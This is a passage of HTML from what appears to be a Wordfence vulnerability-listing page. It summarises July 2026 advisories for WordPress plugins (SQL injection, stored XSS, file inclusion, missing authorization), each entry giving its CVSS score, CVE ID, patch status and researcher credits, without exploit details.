</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/storegrowth-sales-booster" target="_blank" rel="noopener">StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce</a> <span class="wfvr-software-slug">[storegrowth-sales-booster]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chawabhon-netisingha-jnx03" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01d45ecf2afce2efacfa60186c282224.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01d45ecf2afce2efacfa60186c282224"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chawabhon-netisingha-jnx03" target="_blank" rel="noopener">Chawabhon Netisingha (JNX03)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/79d4d776-411e-45ec-aff7-23453e686bf2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e898e40-2cc3-4b5a-833b-899e9c9f26d3" target="_blank" rel="noopener">Subscriptions for WooCommerce &lt;= 2.0.0 &#8211; Missing Authorization to Authenticated (Shop Manager+) Arbitrary Plugin Installation via wps_sfw_install_plugin_configuration AJAX Action</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15397" target="_blank" rel="noopener noreferrer">							CVE-2026-15397						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscriptions-for-woocommerce" target="_blank" rel="noopener">Subscriptions for WooCommerce</a> <span class="wfvr-software-slug">[subscriptions-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e898e40-2cc3-4b5a-833b-899e9c9f26d3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/922c029e-57a9-4c18-8598-9ea3bbc2ab69" target="_blank" rel="noopener">Ultimate Addons for Contact Form 7 &lt;= 3.5.45 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65439" target="_blank" rel="noopener noreferrer">							CVE-2026-65439						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-addons-for-contact-form-7" target="_blank" rel="noopener">Ultra Addons for Contact Form 7</a> <span class="wfvr-software-slug">[ultimate-addons-for-contact-form-7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/922c029e-57a9-4c18-8598-9ea3bbc2ab69" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c77b357e-4bcd-45e2-9a84-7d299fcfdd88" target="_blank" rel="noopener">wpDataTables (Premium) &lt;= 7.5.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65509" target="_blank" rel="noopener noreferrer">							CVE-2026-65509						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdatatables-2" target="_blank" rel="noopener">wpDataTables – WordPress Data Table, Dynamic Tables &amp; Table Charts Plugin</a> <span class="wfvr-software-slug">[wpdatatables]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ba04da1dd94296eb4136b3e7bd671e6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ba04da1dd94296eb4136b3e7bd671e6c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vantastic" target="_blank" rel="noopener">VanTastic</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c77b357e-4bcd-45e2-9a84-7d299fcfdd88" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/baca279b-0c42-48a9-930a-8d0525066e0a" target="_blank" rel="noopener">Payment forms, Buy now buttons, and Invoicing System | GetPaid &lt;= 2.8.56 &#8211; Authenticated (Administrator+) Local File Inclusion via Payment Form &#8216;type&#8217; Element Field</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17605" target="_blank" rel="noopener noreferrer">							CVE-2026-17605						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/invoicing" target="_blank" rel="noopener">Payment forms, Buy now buttons, and Invoicing System | GetPaid</a> <span class="wfvr-software-slug">[invoicing]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/baca279b-0c42-48a9-930a-8d0525066e0a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d352e4d1-92ab-482b-8fce-90ee3e22ba3c" target="_blank" rel="noopener">Advanced Views &lt;= 3.9.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Sensitive Information Exposure via &#8216;view-refresh&#8217; and &#8216;card-refresh&#8217; REST Endpoints</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17580" target="_blank" rel="noopener noreferrer">							CVE-2026-17580						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-views" target="_blank" rel="noopener">Advanced Views – Display Custom Fields (ACF, Pods, MetaBox), Posts, CPT and Woo Products anywhere in Gutenberg, Elementor, Divi, Beaver…</a> <span class="wfvr-software-slug">[acf-views]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d352e4d1-92ab-482b-8fce-90ee3e22ba3c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/582fa92d-8e52-49a9-94ce-f1b49229f591" target="_blank" rel="noopener">Chaty Pro &lt;= 3.5.5 &#8211; Authenticated (Subscriber+) SQL Injection via &#8216;widget_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6251" target="_blank" rel="noopener noreferrer">							CVE-2026-6251						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chaty-pro" target="_blank" rel="noopener">Chaty Pro</a> <span class="wfvr-software-slug">[chaty-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/582fa92d-8e52-49a9-94ce-f1b49229f591" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/836af607-a9cb-4ea2-b3e8-0cd42a04254b" target="_blank" rel="noopener">Creative Mail – Easier WordPress &amp; WooCommerce Email Marketing &lt;= 1.6.9 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65547" target="_blank" rel="noopener noreferrer">							CVE-2026-65547						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/creative-mail-by-constant-contact" target="_blank" rel="noopener">Creative Mail – Easier WordPress &amp; WooCommerce Email Marketing</a> <span class="wfvr-software-slug">[creative-mail-by-constant-contact]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taichi-kashimura" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/416da74662adf95005d209efd456836e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="416da74662adf95005d209efd456836e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taichi-kashimura" target="_blank" rel="noopener">Taichi Kashimura</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/836af607-a9cb-4ea2-b3e8-0cd42a04254b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a4647620-e06a-49d5-8f9d-a59cb5a999b1" target="_blank" rel="noopener">CubeWP Framework &lt;= 1.1.30 &#8211; Authenticated (Subscriber+) SQL Injection via &#8216;relation_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6453" target="_blank" rel="noopener noreferrer">							CVE-2026-6453						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cubewp-framework" target="_blank" rel="noopener">CubeWP Framework</a> <span class="wfvr-software-slug">[cubewp-framework]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/louis-deschanel" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/05990c2d2635cef18ddf1e675469a91b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="05990c2d2635cef18ddf1e675469a91b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/louis-deschanel" target="_blank" rel="noopener">Louis Deschanel (JeanJeanLeHaxor)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pascal-sun" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3fa2c8b95407509d805e36f901ce7bdf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3fa2c8b95407509d805e36f901ce7bdf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pascal-sun" target="_blank" rel="noopener">Pascal SUN</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a4647620-e06a-49d5-8f9d-a59cb5a999b1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a812aad-d769-4c28-8035-471bd3a50faa" target="_blank" rel="noopener">Easy Digital Downloads &lt;= 3.6.9 &#8211; Authenticated (Admin) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66476" target="_blank" rel="noopener noreferrer">							CVE-2026-66476						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-digital-downloads" target="_blank" rel="noopener">Easy Digital Downloads – eCommerce Payments and Subscriptions made easy</a> <span class="wfvr-software-slug">[easy-digital-downloads]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a812aad-d769-4c28-8035-471bd3a50faa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1543265e-dbbf-4d48-aaa9-353e2a5c3fe9" target="_blank" rel="noopener">Icegram Engage &lt;= 3.1.42 &#8211; Authenticated (Contributor+) Second-Order SQL Injection via &#8216;messages[][id]&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16087" target="_blank" rel="noopener noreferrer">							CVE-2026-16087						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/icegram" target="_blank" rel="noopener">Icegram Engage – Popups, Optins, CTAs &amp; Lead Generation</a> <span class="wfvr-software-slug">[icegram]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1543265e-dbbf-4d48-aaa9-353e2a5c3fe9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1dbc2ca-eb3f-4c0f-a5c0-28579f694237" target="_blank" rel="noopener">Improved Save Button &lt;= 1.2.1 &#8211; Authenticated (Author+) Second-Order SQL Injection via &#8216;meta_key&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16092" target="_blank" rel="noopener noreferrer">							CVE-2026-16092						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/improved-save-button" target="_blank" rel="noopener">Improved Save Button</a> <span class="wfvr-software-slug">[improved-save-button]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a1dbc2ca-eb3f-4c0f-a5c0-28579f694237" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/de11c9ad-0b9f-4934-8dc9-dc324d77d702" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education &lt;= 3.7.14 &#8211; Insecure Direct Object Reference to Authenticated (Instructor+) Arbitrary Attachment Deletion</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5060" target="_blank" rel="noopener noreferrer">							CVE-2026-5060						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/330e80e945f955de7587e8496f9e1cee.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="330e80e945f955de7587e8496f9e1cee"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-moniruzzaman-prodhan" target="_blank" rel="noopener">Md. Moniruzzaman Prodhan (NomanProdhan)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/de11c9ad-0b9f-4934-8dc9-dc324d77d702" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3ca06c0-6a7d-43ee-ac59-698e0f525e23" target="_blank" rel="noopener">Plugin Organizer &lt;= 10.2.4 &#8211; Authenticated (Subscriber+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15304" target="_blank" rel="noopener noreferrer">							CVE-2026-15304						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/plugin-organizer" target="_blank" rel="noopener">Plugin Organizer</a> <span class="wfvr-software-slug">[plugin-organizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zhuxuan-wu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0762f07d2d241bc80d9a4817b0625b83.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0762f07d2d241bc80d9a4817b0625b83"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zhuxuan-wu" target="_blank" rel="noopener">zhuxuan wu</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
